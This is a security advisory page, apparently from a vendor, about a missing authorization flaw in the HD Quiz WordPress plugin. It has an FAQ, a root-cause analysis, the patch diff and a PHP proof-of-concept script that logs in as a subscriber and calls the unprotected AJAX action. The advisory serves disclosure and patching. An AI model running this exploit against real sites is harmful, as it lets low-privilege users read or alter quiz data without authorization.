What is CVE-2026-24544?

CVE-2026-24544 is a medium severity vulnerability in the HD Quiz plugin for WordPress, affecting versions up to and including 2.0.9. It is caused by a missing authorization check in the `hdq_get_question_type` AJAX handler, allowing authenticated users with subscriber-level access or higher to perform unauthorized actions.

How does the vulnerability work?

The vulnerability allows authenticated attackers to send crafted POST requests to the WordPress AJAX endpoint, specifically targeting the `hdq_get_question_type` function. This function processes requests without verifying user permissions, enabling attackers to access or manipulate quiz data.

Who is affected by this vulnerability?

Any WordPress site using the HD Quiz plugin version 2.0.9 or earlier is affected. Specifically, authenticated users with subscriber-level permissions or higher can exploit this vulnerability to perform unauthorized actions.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the HD Quiz plugin installed on your WordPress site. If it is version 2.0.9 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability can be mitigated by updating the HD Quiz plugin to version 2.0.10 or later, which includes the necessary authorization checks to prevent unauthorized access. Regularly check for updates to maintain security.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to protect user data and site integrity.

What actions can an attacker perform if they exploit this vulnerability?

If exploited, an attacker can perform unauthorized actions such as viewing, modifying, or deleting quiz questions and related data. This could compromise the confidentiality and integrity of quiz content without affecting the overall site security.

What is the proof of concept for this vulnerability?

The proof of concept involves authenticating as a subscriber user and sending a crafted POST request to the AJAX endpoint. This demonstrates how an attacker can bypass authorization checks and access restricted functionality.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the HD Quiz plugin until a secure version can be installed. Additionally, review user roles and limit access to authenticated users until the vulnerability is patched.

Are there any other security measures I should take?

In addition to updating plugins, regularly audit your WordPress site for vulnerabilities, use strong passwords, implement two-factor authentication, and maintain backups. These practices enhance overall site security.

Where can I find more information about this vulnerability?

More information about CVE-2026-24544 can be found on the official CVE database and security advisory sites. Additionally, the plugin’s changelog and support forums may provide insights into the vulnerability and its resolution.

How can I report a vulnerability I discover?

If you discover a vulnerability, report it to the plugin developers through their official support channels or issue trackers. Responsible disclosure helps improve security for all users.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24544: HD Quiz <= 2.0.9 – Missing Authorization (hd-quiz)

CVE ID CVE-2026-24544

Plugin hd-quiz

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.0.9

Patched Version 2.0.10

Disclosed January 23, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24544:
The HD Quiz WordPress plugin contains a missing authorization vulnerability in versions up to and including 2.0.9. The vulnerability allows authenticated attackers with subscriber-level permissions or higher to perform unauthorized administrative actions. The CVSS score of 4.3 reflects a medium severity issue.

Atomic Edge research identifies the root cause as a missing capability check within the `hdq_get_question_type` AJAX handler function. The vulnerable function is located in the file `/hd-quiz/includes/actions-ajax.php`. The function `hdq_get_question_type` (lines 118-142) processes POST requests containing `question_type`, `quiz_id`, and `question_id` parameters. Prior to the patch, this function executed without verifying the user’s permissions via the `hdq_user_permission()` function.

The exploitation method involves an authenticated attacker sending a crafted POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The attacker must set the `action` parameter to `hdq_get_question_type`. The request must also include the parameters `question_type`, `quiz_id`, and optionally `question_id`. Subscriber-level users can trigger this action, which is intended for administrative users only, leading to unauthorized data access or manipulation.

The patch adds a capability check at the beginning of the `hdq_get_question_type` function. The fix inserts the conditional `if (!hdq_user_permission()) { die(); }` on line 120. This change ensures the function terminates execution for users lacking the required permissions. The patch also updates the plugin version from 2.0.9 to 2.0.10 in `/hd-quiz/index.php`. Additional changes refactor other class methods to call `validateAccess()` without parameters, but the primary security fix is the added permission check.

Successful exploitation allows attackers with subscriber accounts to perform actions reserved for administrators or editors. This could lead to unauthorized viewing, modification, or deletion of quiz questions and related data. The impact is limited to data confidentiality and integrity within the HD Quiz component, not full site compromise.

Differential between vulnerable and patched code

Code Diff

--- a/hd-quiz/assets/block/render.php
+++ b/hd-quiz/assets/block/render.php
@@ -4,7 +4,7 @@
  * @see https://github.com/WordPress/gutenberg/blob/trunk/docs/reference-guides/block-api/block-metadata.md#render
  */

-$quizId = intval($attributes["quizId"]);
+$quizId = intval($attributes["quizId"] ?? 0);
 if ($quizId > 0) {
     echo do_shortcode('[HDquiz quiz = "' . esc_attr($quizId) . '"]');
 } else {
--- a/hd-quiz/classes/dashboard.php
+++ b/hd-quiz/classes/dashboard.php
@@ -5,7 +5,7 @@
     public $fields = array();
     public $settings = array();

-    function __construct($flat = false)
+    function __construct()
     {
         $this->settings();
         $this->fields();
--- a/hd-quiz/classes/question.php
+++ b/hd-quiz/classes/question.php
@@ -364,7 +364,7 @@
             return $res;
         }

-        $res = $this->validateAccess($this->data);
+        $res = $this->validateAccess();

         if ($res !== false) {
             return $res;
@@ -396,7 +396,7 @@
             return $res;
         }

-        $res = $this->validateAccess($this->data);
+        $res = $this->validateAccess();
         if ($res !== false) {
             return $res;
         }
@@ -503,7 +503,7 @@
             return $res;
         }

-        $res = $this->validateAccess($this->data);
+        $res = $this->validateAccess();
         if ($res !== false) {
             return $res;
         }
--- a/hd-quiz/classes/quiz.php
+++ b/hd-quiz/classes/quiz.php
@@ -620,7 +620,7 @@
 			return $res;
 		}

-		$res = $this->validateAccess($this->data);
+		$res = $this->validateAccess();

 		if ($res !== false) {
 			return $res;
@@ -857,7 +857,7 @@

 		$this->term = get_term($this->quiz_id, "quiz");

-		$res = $this->validateAccess($this->data);
+		$res = $this->validateAccess();
 		if ($res !== false) {
 			return $res;
 		}
--- a/hd-quiz/hdfields/classes/fields.php
+++ b/hd-quiz/hdfields/classes/fields.php
@@ -189,7 +189,7 @@
             }
             $html .= '<div id = "hd_tab_content_' . esc_attr($tab["id"]) . '" class = "hd_tab_content_section ' . $active . '">';
             $html .= '<h2 class="hd_tab_heading">' . esc_html($tab["label"]) . '</h2>';
-            $html .= $this->render_fields($tab["children"], $tab["id"]);
+            $html .= $this->render_fields($tab["children"]);
             $html .= '</div>';
             $i++;
         }
--- a/hd-quiz/includes/actions-ajax.php
+++ b/hd-quiz/includes/actions-ajax.php
@@ -118,6 +118,9 @@

 function hdq_get_question_type()
 {
+    if (!hdq_user_permission()) {
+        die();
+    }
     $question_type = "";
     if (isset($_POST["question_type"])) {
         $question_type = sanitize_text_field($_POST["question_type"]);
@@ -127,7 +130,7 @@
     if (isset($_POST["quiz_id"])) {
         $quiz_id = intval($_POST["quiz_id"]);
     }
-
+
     $question_id = 0;
     if (isset($_POST["question_id"])) {
         $question_id = intval($_POST["question_id"]);
--- a/hd-quiz/includes/share-page.php
+++ b/hd-quiz/includes/share-page.php
@@ -1,160 +0,0 @@
-<?php
-/*
-    Experimental template for Facebook sharing
-    This template will show for any page that has a permalink structure of ./hd-quiz/*
-*/
-
-$quizId = 0;
-if (isset($_GET["quiz_id"])) {
-    $quizId = intval($_GET["quiz_id"]);
-}
-
-if ($quizId === 0) {
-    die("No quiz ID was provided for this share dialogue");
-}
-
-$permalink = null;
-if (isset($_GET["permalink"])) {
-    $permalink = sanitize_url($_GET["permalink"]);
-}
-if ($permalink === null) {
-    die("Incorrect share link does not contain permlaink of quiz");
-}
-
-$pageId = url_to_postid($permalink);
-$image = get_the_post_thumbnail_url($pageId);
-
-$score = "";
-
-// Get HDQ Settings
-$settings = new _hdq_settings();
-$settings = $settings->data;
-$share_text = $settings["share_text"]["value"];
-$share_text_personality = $settings["share_text_personality"]["value"];
-$quiz_start_text = $settings["translate_quiz_start"]["value"];
-
-// Get Quiz Settings
-$quiz = new _hdq_quiz($quizId);
-if ($quiz->term == "") {
-    die("Quiz no longer exists");
-}
-$quiz_name = $quiz->quiz_name;
-$quiz_type = $quiz->quiz_type;
-
-$title = "";
-if ($quiz_type != "personality") {
-    $title = $share_text;
-    if (isset($_GET["score"])) {
-        // I know this is extra, but doing it this way in case anyone ever
-        // needs to modify how the score is presented and this forces clean data
-        $score = array();
-        $scoreStr = sanitize_text_field($_GET["score"]);
-        $scoreArr = explode(",", $scoreStr);
-        $scoreArr = array_map("intval", $scoreArr);
-        array_push($score, $scoreArr[0]);
-        array_push($score, $scoreArr[1]);
-        $score = $score[0] . '/' . $score[1];
-    }
-
-    $title = str_replace("%score%", '<span>' . $score . '</span>', $title);
-} else {
-    $title = $share_text_personality;
-
-    if (isset($_GET["score"])) {
-        $score = sanitize_text_field($_GET["score"]);
-    }
-    $title = str_replace("%score%", '<span>' . $score . '</span>', $title);
-}
-$title = str_replace("%quiz%", '<span>' . $quiz_name . '</span>', $title);
-
-
-?>
-<!DOCTYPE html>
-<html lang="en-US">
-
-<head>
-    <meta charset="UTF-8" />
-    <meta name="viewport" content="width=device-width, initial-scale=1" />
-    <meta name='robots' content='max-image-preview:large' />
-    <title>HD Quiz Share Results</title>
-    <meta name="generator" content="HD Quiz - Free WordPress quiz builder" />
-    <meta property="og:type" content="website" />
-    <meta property="og:title" content="<?php echo $quiz_name . ' | ' . get_bloginfo('name'); ?>" />
-    <meta property="og:description" content="<?php echo esc_attr(sanitize_text_field($title)); ?> #hdquiz" />
-    <meta property="og:image" content="<?php echo $image; ?>" />
-
-    <style>
-        html,
-        body {
-            margin: 0;
-            padding: 0;
-            background-color: #fefefe;
-            color: #222;
-            line-height: 1.2;
-            font-size: 18px;
-        }
-
-        #hd_quiz_share_wrapper {
-            max-width: 600px;
-            margin-top: 4rem;
-            margin-left: auto;
-            margin-right: auto;
-            border: 2px solid #eee;
-            padding: 2rem;
-            box-shadow: 0 0 22px #ddd, 0 0 22px #fff;
-        }
-
-        #hdq_view_quiz_button {
-            text-align: center;
-            display: inline-block;
-        }
-
-        #hd_quiz_share_wrapper>h1 {
-            margin: 0 0 1em 0;
-            padding: 0;
-            color: #444;
-            font-weight: normal;
-        }
-
-        #hd_quiz_share_wrapper>h1>span {
-            color: #222;
-            font-weight: bold;
-        }
-
-        #hd_quiz_share_wrapper>p {
-            margin: 0
-        }
-
-        #hd_quiz_share_wrapper>p>a {
-            text-decoration: none;
-            color: #fff;
-            background-color: #222;
-            padding: 1em;
-            line-height: 1;
-        }
-
-        #featured_image_wrapper>img {
-            display: block;
-            max-width: 100%;
-            margin-bottom: 1rem;
-        }
-    </style>
-</head>
-
-<body>
-    <main id="hd_quiz_share_wrapper">
-        <?php
-        if ($image) {
-        ?>
-            <div id="featured_image_wrapper">
-                <img src="<?php echo $image; ?>" alt="HD Quiz featured image" />
-            </div>
-        <?php
-        }
-        ?>
-        <h1><?php echo $title; ?></h1>
-        <p><a href="<?php echo esc_attr($permalink); ?>" id="hdq_view_quiz_button"><?php echo esc_html($quiz_start_text); ?></a></p>
-    </main>
-</body>
-
-</html>
 No newline at end of file
--- a/hd-quiz/index.php
+++ b/hd-quiz/index.php
@@ -5,7 +5,7 @@
     * Plugin URI: https://harmonicdesign.ca/hd-quiz/
     * Author: Harmonic Design
     * Author URI: https://harmonicdesign.ca
-    * Version: 2.0.9
+    * Version: 2.0.10
 	* Text Domain: hd-quiz
 	* Domain Path: /languages
 */
@@ -23,7 +23,7 @@
     die('Invalid request.');
 }
 if (!defined('HDQ_PLUGIN_VERSION')) {
-    define('HDQ_PLUGIN_VERSION', '2.0.9');
+    define('HDQ_PLUGIN_VERSION', '2.0.10');
 }

 // Settings that a power user might want to change,
@@ -109,33 +109,34 @@
 function hdq_create_settings_page()
 {
     if (hdq_user_permission()) {
-        function hdq_register_quizzes_page()
-        {
-            $addon_text = "";
-            $new_addon = get_transient("hdq_new_addon");
-            if ($new_addon === false) {
-                hdq_check_for_updates();
-            } else {
-                $new_addon["isNew"] = sanitize_text_field($new_addon["isNew"]);
-                if ($new_addon["isNew"] === "yes") {
-                    $addon_text = ' <span class="awaiting-mod">NEW</span>';
-                }
-            }
-
-            add_menu_page('HD Quiz', 'HD Quiz', 'publish_posts', 'hdq_quizzes', 'hdq_main_page', 'dashicons-clipboard', 5);
-
-            add_submenu_page("hdq_quizzes", "HD Quiz Addons", __("Addons", "hd-quiz") . $addon_text, "delete_others_posts", "hdq_addons", "hdq_addons_page");
-            add_submenu_page("hdq_quizzes", "HD Quiz Tools", __("Tools", "hd-quiz"), "manage_options", "hdq_tools", "hdq_tools_page");
-            add_submenu_page("hdq_quizzes", "HD Quiz Settings", __("Settings", "hd-quiz"), "manage_options", 'hdq_options', 'hdq_about_settings_page');
-
-            // tools, hidden pages
-            add_submenu_page("", "CSV Importer", "CSV Importer", "manage_options", "hdq_importer", "hdq_tools_csv_importer");
-        }
         add_action('admin_menu', 'hdq_register_quizzes_page');
     }
 }
 add_action('init', 'hdq_create_settings_page');

+function hdq_register_quizzes_page()
+{
+    $addon_text = "";
+    $new_addon = get_transient("hdq_new_addon");
+    if ($new_addon === false) {
+        hdq_check_for_updates();
+    } else {
+        $new_addon["isNew"] = sanitize_text_field($new_addon["isNew"]);
+        if ($new_addon["isNew"] === "yes") {
+            $addon_text = ' <span class="awaiting-mod">NEW</span>';
+        }
+    }
+
+    add_menu_page('HD Quiz', 'HD Quiz', 'publish_posts', 'hdq_quizzes', 'hdq_main_page', 'dashicons-clipboard', 5);
+
+    add_submenu_page("hdq_quizzes", "HD Quiz Addons", __("Addons", "hd-quiz") . $addon_text, "delete_others_posts", "hdq_addons", "hdq_addons_page");
+    add_submenu_page("hdq_quizzes", "HD Quiz Tools", __("Tools", "hd-quiz"), "manage_options", "hdq_tools", "hdq_tools_page");
+    add_submenu_page("hdq_quizzes", "HD Quiz Settings", __("Settings", "hd-quiz"), "manage_options", 'hdq_options', 'hdq_about_settings_page');
+
+    // tools, hidden pages
+    add_submenu_page("", "CSV Importer", "CSV Importer", "manage_options", "hdq_importer", "hdq_tools_csv_importer");
+}
+
 /* Set custom plugin links on WP plugins page
 ------------------------------------------------------- */
 function hdq_plugin_links($actions, $plugin_file, $plugin_data, $context)

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24544 - HD Quiz <= 2.0.9 - Missing Authorization

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to obtain WordPress cookies
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_');

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Exploit the missing authorization in the AJAX handler
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'hdq_get_question_type',
    'question_type' => 'multiple_choice', // Example question type
    'quiz_id' => 1, // Target quiz ID
    'question_id' => 0 // Optional question ID
)));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 3: Analyze the response
if ($http_code == 200 && $response !== false && trim($response) !== '') {
    echo "[+] Exploit successful. Unauthorized AJAX action executed.n";
    echo "[+] Response: " . htmlspecialchars(substr($response, 0, 500)) . "n";
} else {
    echo "[-] Exploit failed or endpoint returned empty. HTTP Code: $http_coden";
}

unlink($cookie_file);

?>

Frequently Asked Questions

What is CVE-2026-24544?
Overview of the vulnerability
CVE-2026-24544 is a medium severity vulnerability in the HD Quiz plugin for WordPress, affecting versions up to and including 2.0.9. It is caused by a missing authorization check in the `hdq_get_question_type` AJAX handler, allowing authenticated users with subscriber-level access or higher to perform unauthorized actions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows authenticated attackers to send crafted POST requests to the WordPress AJAX endpoint, specifically targeting the `hdq_get_question_type` function. This function processes requests without verifying user permissions, enabling attackers to access or manipulate quiz data.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the HD Quiz plugin version 2.0.9 or earlier is affected. Specifically, authenticated users with subscriber-level permissions or higher can exploit this vulnerability to perform unauthorized actions.
How can I check if my site is vulnerable?
Assessing your plugin version
To determine if your site is vulnerable, check the version of the HD Quiz plugin installed on your WordPress site. If it is version 2.0.9 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability can be mitigated by updating the HD Quiz plugin to version 2.0.10 or later, which includes the necessary authorization checks to prevent unauthorized access. Regularly check for updates to maintain security.
What does the CVSS score of 4.3 mean?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to protect user data and site integrity.
What actions can an attacker perform if they exploit this vulnerability?
Potential impact of exploitation
If exploited, an attacker can perform unauthorized actions such as viewing, modifying, or deleting quiz questions and related data. This could compromise the confidentiality and integrity of quiz content without affecting the overall site security.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept involves authenticating as a subscriber user and sending a crafted POST request to the AJAX endpoint. This demonstrates how an attacker can bypass authorization checks and access restricted functionality.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the HD Quiz plugin until a secure version can be installed. Additionally, review user roles and limit access to authenticated users until the vulnerability is patched.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating plugins, regularly audit your WordPress site for vulnerabilities, use strong passwords, implement two-factor authentication, and maintain backups. These practices enhance overall site security.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-24544 can be found on the official CVE database and security advisory sites. Additionally, the plugin’s changelog and support forums may provide insights into the vulnerability and its resolution.
How can I report a vulnerability I discover?
Responsible disclosure process
If you discover a vulnerability, report it to the plugin developers through their official support channels or issue trackers. Responsible disclosure helps improve security for all users.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations